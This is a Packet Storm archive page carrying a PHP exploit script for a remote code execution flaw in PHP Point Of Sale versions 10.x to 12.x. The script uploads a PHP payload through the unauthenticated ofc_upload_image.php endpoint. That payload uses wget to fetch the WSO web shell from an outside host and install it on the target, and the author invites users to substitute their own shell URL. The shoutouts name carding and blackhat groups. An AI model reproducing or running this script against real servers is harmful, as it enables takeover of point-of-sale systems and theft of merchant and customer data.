exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PHP Point Of Sale 10.x / 11.x / 12.x Remote Code Execution

PHP Point Of Sale 10.x / 11.x / 12.x Remote Code Execution
Posted Oct 18, 2013
Authored by Gabby

PHP Point Of Sale versions 10.x, 11.x, and 12.x remote code execution exploit.

tags | exploit, remote, php, code execution
SHA-256 | 2688acc1f96e93d7799ccb3540cbe12f48da9bc32d767bb22ca9db0d45a74255

PHP Point Of Sale 10.x / 11.x / 12.x Remote Code Execution

Change Mirror Download
###################################################################################​##################
# __________.__ _________ _________
# \__ ___/| |__ ____ \_ ___ \_______ ______ _ ________ \_ ___ \_______ ______ _ __
# | | | | \_/ __ \ / \ \/\_ __ \/ _ \ \/ \/ / ___/ / \ \/\_ __ \_/ __ \ \/ \/ /
# | | | Y \ ___/ \ \____| | \( <_> ) /\___ \ \ \____| | \/\ ___/\ /
# |____| |___| /\___ > \______ /|__| \____/ \/\_//____ > \______ /|__| \___ >\/\_/
# \/ \/ \/ \/ \/ \/
#
#
#http://thecrowscrew.org
###################################################################################​##################
# Exploit title : PHP Point Of Sale 10.x - 11.x - 12.x Remote Code Execution Vulnerability
# Author : Gabby
# Dork : use ur brain ;)
# Vendor Site : https://www.phppointofsale.com/‎
# Software : http://sourceforge.net/projects/opensourcepos/
###################################################################################​##################
<?php
$options = getopt('t:n:');
if(!isset($options['t'], $options['n']))
die("\n [+] Simple Exploiter Point Of Sale by Gabby [+] \n Usage : php sale.php -t http://target.com -n bie.php\n
-t http://target.com = Target mu ..
-n bie.php = Nama file yang mau kamu pakai...\n\n");

$target = $options['t'];
$nama = $options['n'];
$shell = "{$target}/application/libraries/tmp-upload-images/{$nama}";
$target = "{$target}/application/libraries/ofc-library/ofc_upload_image.php?name={$nama}";
$data = '<?php
system("wget http://0wn3d.ga/wso.txt; mv wso.txt bie.php");
fclose ( $handle );
?>';
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');
echo "=============================================== \n";
echo ": Simple Exploiter Point Of Sale by Gabby :\n";
echo "=============================================== \n\n";
echo "[+] Upload Shell ke : {$options['t']}\n";
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $target);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo "[+] Exploit Sukses,.. :D\n";
echo "[+] {$shell}\n";
}
else
{
die("[-] Exploit Gagal,.. :(\n");
}

?>

ps ; u can change that shell url with ur own,..

###################################################################################​##################
Thanks to :
Catalyst71 di tunggu tri-ji-pi-nya >_<, kit4r0, 777r, ovanIsmycode, walangkaji, y0g4, N035, my "Dad",
my sista Wii, cW3 G4pt3K, Red-x, Vanda, Deb + Sultan yg dah mulai sombong, Meninbox, /Dzawa yg udah
temenin begadang, Th3.Black.D3Vils n all my luvly friend,..

Greets to :
Yogyacarderlink, SurabayaBlackhat & Madleets Team... ^^
###################################################################################​##################
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close